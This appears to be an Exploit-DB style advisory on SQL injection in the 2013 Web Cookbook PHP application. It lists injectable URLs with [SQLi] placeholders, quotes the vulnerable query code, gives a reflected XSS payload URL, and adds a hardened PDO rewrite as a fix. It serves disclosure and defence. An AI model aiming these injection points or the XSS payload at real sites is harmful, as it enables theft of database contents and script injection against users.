Vendor: Web Cookbook
Author: Saadat Ullah
CVSS: 8.8 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Web Cookbook
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.2.15 (Centos) PHP/5.3.3
Year: 2013

Web Cookbook Multiple SQL Injection

Web Cookbook contains multiple SQL injection vulnerabilities. The application does not sanitize user-supplied input before using it in SQL queries, so an attacker can inject arbitrary SQL and manipulate the queries the application runs. The affected scripts are 'searchrecipe.php' and 'showtext.php', when processing the 'sstring', 'mode', 'title', 'prefix', 'preparation', 'postfix', 'tipp' and 'ingredient' parameters; successful exploitation can disclose sensitive information from the database. The application is also vulnerable to a simple non-persistent (reflected) XSS when processing the 'sstring' parameter.

Mitigation:

Input validation should be used to ensure that untrusted data is never used to build SQL query strings. Additionally, the application should be changed to use parameterized (prepared) queries, so that user input is bound as data rather than concatenated into the SQL text.

Exploit-DB raw data:

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah, saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
	initDB();
	echo "<div class=\"rdisplay\">\n";
	$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; // using a non-sanitized field in the query
	$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
	$title = $_GET['title'];
	$prefix = $_GET['prefix'];
	$preparation = $_GET['preparation'];
	$postfix = $_GET['postfix'];
	$tipp = $_GET['tipp'];
	$ingredient = $_GET['ingredient'];
	.
	.
	.
	if ($title != "") {
		$sstring = "a.title LIKE '%$title%' ";
	}
	.
	.
	searchRecipe($mode, $sstring);
	.
	.
	In Function SearchRecipe
				$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
		if ($sstring != "") {
			searchRecipe(0, $sstring);
.
.
.
	$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Persistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
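The following PHP is an added example, not code from Web Cookbook or from the advisory author. It implements the parameterized-query mitigation described in the Mitigation section for the two query paths quoted in the PoC (showText() in showtext.php and searchRecipe() in searchrecipe.php), and adds the output encoding that closes the reflected XSS. Assumptions not on the page: PHP 7.1 or later with PDO (the mysql_* functions used by the original were removed in PHP 7), a hypothetical initPdo() helper standing in for initDB() with placeholder connection details, the table and column names exactly as quoted in the PoC, and that searchrecipe.php echoes the search term back into the page (the advisory states the XSS but does not show the echo).

```php
<?php
// Added example, not Web Cookbook's own code: hardened replacements for the
// showText() and searchRecipe() query paths quoted in the PoC, plus output
// encoding for the reflected search term. Assumed (not on the page): a PDO
// helper initPdo() standing in for initDB(), placeholder DSN/credentials, and
// that searchrecipe.php echoes the search term back into the page.

declare(strict_types=1);

function initPdo(): PDO
{
    // Placeholder connection details; replace with the real ones.
    $pdo = new PDO(
        'mysql:host=localhost;dbname=cookbook;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASS_PLACEHOLDER'
    );
    // Fail loudly, and use server-side prepares so bound values are never
    // interpolated into the SQL text on the client side.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// showtext.php: 'mode' is the integer id of a dat_texte row. Validate the type
// before the value goes anywhere near SQL, then bind it as an integer.
function showTextSafe(PDO $pdo, $mode): ?array
{
    $id = filter_var($mode, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a positive integer is rejected here
    }
    $stmt = $pdo->prepare('SELECT * FROM dat_texte WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Turn a free-text search term into a LIKE pattern. '!' is declared as the
// escape character in the query so '%' and '_' typed by the user match literally.
function likePattern(string $term): string
{
    $term = mb_substr($term, 0, 100); // bound the length of what we search for
    $term = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
    return '%' . $term . '%';
}

// searchrecipe.php: the original spliced $sstring into the SQL string; here the
// pattern is a bound parameter, so quotes or comment sequences in it are data.
// The implicit cross join with mixed OR/AND from the original is replaced by an
// explicit LEFT JOIN, which keeps title matches for recipes without ingredients.
function searchRecipeSafe(PDO $pdo, string $sstring, int $limit = 50): array
{
    $pattern = likePattern($sstring);
    $sql = 'SELECT DISTINCT a.id, a.title '
         . 'FROM das_rezept a LEFT JOIN dat_ingredient b ON a.id = b.recipe '
         . "WHERE a.title LIKE :p1 ESCAPE '!' OR b.description LIKE :p2 ESCAPE '!' "
         . 'ORDER BY a.title LIMIT :lim';
    $stmt = $pdo->prepare($sql);
    // Native prepares do not allow reusing one named placeholder, hence :p1/:p2.
    $stmt->bindValue(':p1', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':p2', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output encoding for the reflected search term (the XSS in the advisory):
// encode at the point of output, with the page's charset, in every HTML context.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Request handling in the shape of the original scripts (assumed structure).
if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/html; charset=UTF-8');
    $pdo = initPdo();

    $mode = $_GET['mode'] ?? '';
    if (($text = showTextSafe($pdo, $mode)) !== null) {
        // The columns of dat_texte are not on the page; encode whatever comes back.
        echo '<div class="rdisplay">' . html(implode(' ', array_map('strval', $text))) . "</div>\n";
    }

    $title = (string) ($_GET['title'] ?? '');
    if ($title !== '') {
        echo '<p>Results for ' . html($title) . "</p>\n";
        foreach (searchRecipeSafe($pdo, $title) as $row) {
            echo '<li>' . html($row['title']) . "</li>\n";
        }
    }
}
```

Binding alone is what removes the injection: once the value travels as a parameter it cannot change the statement's structure, whatever characters it contains. The integer check in showTextSafe() and the length cap in likePattern() are defence in depth, rejecting malformed input early and giving the query a predictable shape; the LIKE escaping is not a security control but stops a user-supplied '%' from turning a search into a full-table match. The same hardening applies unchanged to the other searchrecipe.php parameters ('prefix', 'preparation', 'postfix', 'tipp', 'ingredient'), which the PoC shows being read from $_GET in exactly the same way as 'title'.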


#Independent Pakistani Security Researcher